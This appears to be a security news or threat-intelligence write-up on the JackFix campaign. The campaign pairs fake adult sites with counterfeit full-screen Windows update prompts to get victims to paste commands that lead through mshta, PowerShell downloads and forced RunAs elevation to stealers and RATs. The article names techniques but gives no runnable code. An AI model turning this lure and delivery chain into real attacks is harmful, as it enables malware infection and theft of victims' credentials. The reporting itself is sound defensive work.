JackFix Malware Campaign
A recent investigation highlights a growing wave of attacks exploiting ClickFix‑style social engineering. These schemes rely on convincing victims to execute harmful commands themselves, often through staged technical prompts. The latest operation takes this tactic further by pairing it with fake adult websites and counterfeit Windows update notices, forming a highly manipulative infection chain security teams have dubbed JackFix.
Table of Contents
Adult‑Themed Phishing Portals as the Entry Point
The campaign begins with fraudulent adult sites crafted to resemble well‑known platforms, delivered through malvertising and other redirect techniques. When users land on these pages, they are swiftly confronted with an urgent update message framed as a critical Windows security notification. The adult theme amplifies the psychological pressure, making the sudden update prompt seem plausible and discouraging users from questioning its authenticity.
Some variants of these sites contain developer remarks in Russian, suggesting a possible connection to a Russian‑speaking threat group.
Deceptive Full‑Screen Update Alerts
Once a visitor interacts with the rogue page, HTML and JavaScript components instantly launch a full‑screen imitation of a Windows update dialog. The interface uses a blue background and simple white text, echoing the style of high‑urgency system messages. JavaScript attempts to force full‑screen mode, while additional code tries to block common escape keys, including Escape, F11, F5, and F12, to trap the user within the fake update.
Despite this, implementation errors allow Escape and F11 to still function, giving users a possible way out.
The crux of the deception lies in the instructions displayed to the victim: open the Windows Run dialog, paste a pre‑copied command, and execute it. Following these steps launches the malicious payload and initiates the compromise.
ClickFix Dominance and the Evolution of the Attack
ClickFix‑style activity has sharply increased, now representing nearly half of documented initial access events. Traditionally, such threats impersonate CAPTCHA checks or troubleshooting prompts. The JackFix campaign marks a shift toward more immersive and system‑like lures, showing how attackers continually refine psychological manipulation to achieve user‑assisted code execution.
Layered Obfuscation and Command‑Triggered Payload Delivery
The first command executed on the victim’s machine leverages mshta.exe to run an MSHTA payload containing JavaScript. This script calls a PowerShell command that retrieves another PowerShell stage from a remote server. To evade scrutiny, the associated domains redirect to harmless sites like Google or Steam when accessed manually. Only requests made via specific PowerShell commands, such as irm or iwr, trigger the malicious response, adding a significant analysis barrier.
The downloaded PowerShell script includes heavy obfuscation: junk code, hidden logic, and checks meant to hinder reverse engineering. It also attempts privilege escalation and adds antivirus exclusions tied to C2 endpoints and staging directories.
Forced Privilege Escalation and Payload Deployment
Privilege uplift is pursued using the Start‑Process cmdlet with the -Verb RunAs parameter, repeatedly prompting the victim until administrative rights are granted. Once elevated, the script deploys additional components, often lightweight remote access trojans designed to contact a C2 server and fetch further malware.
A Diverse Arsenal of Stealers and Loaders
The malware has been observed delivering up to eight distinct payloads, including:
- Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey
- Other loaders and RATs used to stage follow‑on threats
Only one successful execution is enough to jeopardize sensitive data. Victims face the loss of credentials, crypto holdings, and other personal information. Certain loaders also enable attackers to extend the intrusion with more potent malware, escalating the impact significantly.
